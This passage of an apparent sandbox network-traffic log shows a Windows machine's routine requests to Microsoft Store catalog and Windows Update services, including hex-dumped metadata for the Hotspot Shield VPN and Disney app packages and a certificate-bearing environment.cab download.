roductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-27T21:26:59.3928116Z\|\|.\|\|b36cc54a-6f2e-42ab-a7b7-520bad3bef0f\|\|1152921505694380179\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","
2022-06-08 07:57:03 UTC	9681	IN	Data Raw: 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d 4f 22 2c 22 4d 4b 22 2c 22 4d 47 22 2c 22 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c 22 4d 56 22 2c 22 4d 4c 22 2c 22 4e 43 22 2c 22 4e 49 22 2c 22 4e 45 22 2c 22 4e 55 22 2c 22 4e 46 22 2c 22 50 57 22 2c 22 50 53 22 2c 22 50 41 22 2c 22 50 47 22 2c 22 50 59 22 2c 22 52 45 22 2c 22 52 57 22 2c 22 42 4c 22 2c 22 4d 46 22 2c 22 57 53 22 2c 22 53 54 22 2c 22 53 4e 22 2c 22 4d 50 Data Ascii: ","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP
2022-06-08 07:57:03 UTC	9685	IN	Data Raw: 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 57 5a 44 4e 43 52 44 46 4e 47 37 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 63 65 30 33 61 36 62 32 2d 33 36 36 64 2d 34 33 64 34 2d 38 35 61 34 2d 30 37 33 65 63 65 39 61 63 61 36 39 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 61 37 36 30 37 33 30 66 2d 66 37 37 31 2d 34 64 33 66 2d 62 65 34 36 2d 66 61 66 62 65 31 35 66 62 39 37 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 6e 73 62 71 73 74 62 62 39 71 78 62 36 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 Data Ascii: "FulfillmentData":{"ProductId":"9WZDNCRDFNG7","WuBundleId":"ce03a6b2-366d-43d4-85a4-073ece9aca69","WuCategoryId":"a760730f-f771-4d3f-be46-fafbe15fb97e","PackageFamilyName":"6F71D7A7.HotspotShieldFreeVPN_nsbqstbb9qxb6","SkuId":"0010","Content":null,"Packag
2022-06-08 07:57:03 UTC	9689	IN	Data Raw: 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 32 31 34 32 37 39 34 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 35 30 33 39 37 31 38 34 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 6e 73 62 71 73 74 62 62 39 71 78 62 36 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 32 2e 31 30 2e 35 Data Ascii: eIds":[],"MaxDownloadSizeInBytes":22142794,"MaxInstallSizeInBytes":50397184,"PackageFormat":"Msix","PackageFamilyName":"6F71D7A7.HotspotShieldFreeVPN_nsbqstbb9qxb6","MainPackageFamilyNameForDlc":null,"PackageFullName":"6F71D7A7.HotspotShieldFreeVPN_2.10.5
2022-06-08 07:57:03 UTC	9693	IN	Data Raw: 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 48 6f 6c 6f 67 72 61 70 68 69 63 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 43 6f 72 65 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 38 38 32 38 30 38 30 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 Data Ascii: ame":"Windows.Holographic"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Core"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.8828080"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"175
2022-06-08 07:57:03 UTC	9697	IN	Data Raw: 73 2e 5c 72 5c 6e 5c 72 5c 6e e2 96 ba 20 42 52 4f 57 53 45 20 53 45 43 55 52 45 4c 59 5c 72 5c 6e 53 74 61 79 20 73 65 63 75 72 65 20 77 69 74 68 20 6d 69 6c 69 74 61 72 79 2d 67 72 61 64 65 20 65 6e 63 72 79 70 74 65 64 20 74 72 61 66 66 69 63 20 62 65 74 77 65 65 6e 20 79 6f 75 72 20 64 65 76 69 63 65 20 61 6e 64 20 6f 75 72 20 73 65 72 76 65 72 73 20 77 68 69 6c 65 20 63 6f 6e 6e 65 63 74 65 64 20 77 69 74 68 20 48 6f 74 73 70 6f 74 20 53 68 69 65 6c 64 20 56 50 4e 2e 5c 72 5c 6e 5c 72 5c 6e e2 96 ba 20 53 54 41 59 20 50 52 49 56 41 54 45 5c 72 5c 6e 59 6f 75 72 20 70 72 69 76 61 63 79 20 69 73 20 6f 75 72 20 6d 69 73 73 69 6f 6e 2e 20 43 6f 6e 6e 65 63 74 20 74 6f 20 61 6e 79 20 6f 66 20 6f 75 72 20 72 65 6c 69 61 62 6c 65 20 56 50 4e 20 73 65 72 76 Data Ascii: s.\r\n\r\n BROWSE SECURELY\r\nStay secure with military-grade encrypted traffic between your device and our servers while connected with Hotspot Shield VPN.\r\n\r\n STAY PRIVATE\r\nYour privacy is our mission. Connect to any of our reliable VPN serv
2022-06-08 07:57:03 UTC	9701	IN	Data Raw: 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 34 39 37 36 32 33 30 34 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 45 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 6e 73 62 71 73 74 62 62 39 71 78 62 36 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 32 2e 31 30 2e 35 2e 37 30 5f 61 72 6d 5f 5f 6e 73 62 71 73 74 62 62 39 71 78 62 36 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 33 35 64 34 65 65 63 61 2d 33 61 31 34 2d Data Ascii: llSizeInBytes":49762304,"PackageFormat":"EMsix","PackageFamilyName":"6F71D7A7.HotspotShieldFreeVPN_nsbqstbb9qxb6","MainPackageFamilyNameForDlc":null,"PackageFullName":"6F71D7A7.HotspotShieldFreeVPN_2.10.5.70_arm__nsbqstbb9qxb6","PackageId":"35d4eeca-3a14-
2022-06-08 07:57:03 UTC	9705	IN	Data Raw: 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 36 46 37 31 44 37 41 37 2e 48 6f 74 73 70 6f 74 53 68 69 65 6c 64 46 72 65 65 56 50 4e 5f 32 2e 31 30 2e 35 2e 37 30 5f 78 38 36 5f 5f 6e 73 62 71 73 74 62 62 39 71 78 62 36 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 39 64 30 64 30 63 66 35 2d 66 32 32 62 2d 34 37 36 31 2d 61 62 65 65 2d 66 37 30 66 38 30 34 62 37 30 61 62 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 30 39 37 30 34 37 38 35 39 32 2c Data Ascii: 6336,\"content.isMain\":false,\"content.packageId\":\"6F71D7A7.HotspotShieldFreeVPN_2.10.5.70_x86__nsbqstbb9qxb6\",\"content.productId\":\"9d0d0cf5-f22b-4761-abee-f70f804b70ab\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,
2022-06-08 07:57:03 UTC	9709	IN	Data Raw: 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 31 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 66 61 6c 73 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 31 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 34 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 36 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 38 2c 5c 22 73 79 73 74 65 6d 49 64 Data Ascii: se},\"policy2\":{\"ageRating\":1,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":7,\"systemId\":3},{\"level\":12,\"systemId\":5},{\"level\":48,\"systemId\":12},{\"level\":27,\"systemId\":9},{\"level\":76,\"systemId\":16},{\"level\":68,\"systemId
2022-06-08 07:57:03 UTC	9713	IN	Data Raw: 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 31 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 Data Ascii: "Markets":["US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"","WholesaleCurrencyCode":""}},"Properties":{},"SkuId":"0011","DisplayRank":1,"RemediationRequired
2022-06-08 07:57:03 UTC	9713	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:04 UTC	9714	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:04 UTC	9714	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: 2449e085-bbe9-4d1c-88fc-9f6e4eb7b189 MS-RequestId: c6bf225a-acc3-42a3-bcd3-1571d25bff75 MS-CV: 6hx6/XfwRE68IzqO.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:04 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:04 UTC	9715	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:04 UTC	9730	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
2022-06-08 07:57:04 UTC	9746	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:04 UTC	9750	OUT	GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81 Host: sls.update.microsoft.com
2022-06-08 07:57:04 UTC	9750	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "AIP0MQaCzKwF3Wv0wR/DNwKKGDF7CierFQWSKotQHD4=_1440" MS-CorrelationId: d3689695-1e48-4e3b-a110-043f757b85a8 MS-RequestId: 214f367c-5152-40f0-bfc6-b9d0b8c26463 MS-CV: 3sYKnGME50S49cPq.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 08 Jun 2022 07:57:04 GMT Connection: close Content-Length: 35877
2022-06-08 07:57:04 UTC	9751	IN	Data Raw: 4d 53 43 46 00 00 00 00 a5 42 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 0b 87 00 00 14 00 00 00 00 00 10 00 a5 42 00 00 80 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 26 64 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 5a 10 09 f7 39 42 26 64 43 4b ed bd 05 54 5c 5b ba 2d 5c 14 ee ee 1a 08 6e 85 3b 04 0f 1a dc 25 b8 bb 04 97 c2 83 07 09 ee 4e 70 77 09 4e 70 82 05 08 ae 09 ae 21 81 07 c9 91 f4 e9 d3 dd b7 ef ff fa bf fd ee e8 1a 83 aa bd 74 af b5 f6 fa d6 fc be b9 e7 18 c8 29 8b 4a 00 ee 3f ed 04 80 ef 1f b1 1f 3f 00 48 08 08 00 04 00 0a a0 cd 05 00 60 7d cf 41 fb 5e c7 5c 0a f0 db c7 f8 fe ef a1 56 08 3b e0 a7 8f 1f c0 c4 d6 d5 c2 d1 ce d6 c6 c4 d6 99 c9 cd c6 1a e0 3a 60 5b Data Ascii: MSCFBDBId&denvironment.cabZ9B&dCKT\[-\n;%NpwNp!t)J??H`}A^\V;:`[
2022-06-08 07:57:04 UTC	9766	IN	Data Raw: 2c d5 6c a1 e1 97 4f eb 44 d5 d7 31 d1 59 e6 ed 3c 5c f9 e0 bb 34 e4 d4 f6 e5 cf 75 58 d3 7b f1 91 6f 63 a0 cc f4 c4 a6 ab e5 3a e6 92 72 35 5d 84 ce 74 71 d7 d8 f2 ba fb 90 60 ef 04 55 ed e4 64 b9 d4 aa be 35 95 a4 1a 76 94 4a 12 1a 5e d7 70 59 b4 d9 77 7c b8 ec c5 58 bc 81 dc c9 78 5c a5 6d e9 71 c6 e6 a6 15 ed 41 c6 a2 49 2e 32 71 f5 02 07 81 2e 44 1d 42 3d 03 1e a8 78 29 eb e9 65 da ba 86 6b 80 8f 49 2f fa a5 f3 e4 23 e2 fa 9b 83 90 04 f1 75 8a 79 10 c7 93 b7 8f fd 33 4b 03 4f 6b 0f 28 5b b8 32 4e 01 84 ef 42 1d 15 9c 9d 65 dd ca 7a 61 a0 dc bc b3 99 e5 39 00 ce 79 0a 31 d9 aa a7 56 81 87 c8 58 ac 9e 24 94 e7 37 68 95 73 e7 82 04 da c4 25 9d d2 29 a9 f3 9e 78 2e 57 90 a6 a6 93 ee e7 d9 05 1d 46 b8 6c d4 8d 70 2a 62 4a f8 14 89 cc 10 48 bd 5d 96 50 46 Data Ascii: ,lOD1Y<\4uX{oc:r5]tq`Ud5vJ^pYw\|Xx\mqAI.2q.DB=x)ekI/#uy3KOk([2NBeza9y1VX$7hs%)x.WFlp*bJH]PF
2022-06-08 07:57:04 UTC	9782	IN	Data Raw: 00 00 00 15 c5 e7 6b 9e 02 9b 49 99 00 00 00 00 00 15 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 32 31 30 39 33 30 31 38 32 32 32 35 5a 17 0d 33 30 30 39 33 30 31 38 33 32 32 35 5a 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d Data Ascii: kI0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 20100210930182225Z300930183225Z0\|10UUS10UWashington10URedm

Timestamp	kBytes transferred	Direction	Data
2022-06-08 07:57:05 UTC	9786	OUT	GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Disney.37853FC22B2CE_6rarf9sa4v8jt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: Install Service MS-CV: 9g8eTgIWfUaDjTKd.0.2.4 Host: displaycatalog.mp.microsoft.com
2022-06-08 07:57:05 UTC	9786	IN	HTTP/1.1 200 OK Connection: close Date: Wed, 08 Jun 2022 07:57:04 GMT Content-Type: application/json; charset=utf-8 Server: Kestrel Transfer-Encoding: chunked Vary: Authorization MS-CorrelationId: f89b7319-5249-496c-84ca-9a207c9b1f5d MS-RequestId: b1ba6719-b785-4966-939c-22f1b64ed5e5 MS-CV: 9g8eTgIWfUaDjTKd.0.2.4.1227127470.0.1.1227127470.0.0 X-Content-Type-Options: nosniff MS-ServerId: b9576-v7h2x Region: neu Node: aks-bigcatrpns-32351330-vmss00000l MS-DocumentVersions: 9NXQXXLFST89\|2079
2022-06-08 07:57:05 UTC	9787	IN	Data Raw: 66 37 35 64 0d 0a 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 36 2d 30 37 54 32 31 3a 34 39 3a 35 36 2e 35 39 38 39 34 38 35 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 33 39 32 31 33 30 36 39 37 36 36 34 38 30 32 35 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 Data Ascii: f75d{"BigIds":["9NXQXXLFST89"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-06-07T21:49:56.5989485Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3003921306976648025","EISListingIdentifier":null,"BackgroundColor":"transpare
2022-06-08 07:57:05 UTC	9790	IN	Data Raw: 34 34 39 35 33 31 31 38 34 37 31 32 34 31 37 30 2e 65 38 39 61 34 64 63 65 2d 66 64 39 61 2d 34 61 31 30 2d 62 38 65 34 2d 61 36 63 33 61 61 31 63 30 35 35 65 2e 31 33 35 32 66 66 62 62 2d 36 65 36 61 2d 34 30 38 37 2d 38 39 34 32 2d 36 33 66 31 39 35 62 33 34 32 38 66 22 2c 22 57 69 64 74 68 22 3a 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 31 33 35 32 36 32 36 31 37 38 34 36 35 36 32 39 34 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 36 30 32 34 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 Data Ascii: 4495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.1352ffbb-6e6a-4087-8942-63f195b3428f","Width":66},{"FileId":"3013526261784656294","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":6024,"ForegroundColor":"","H
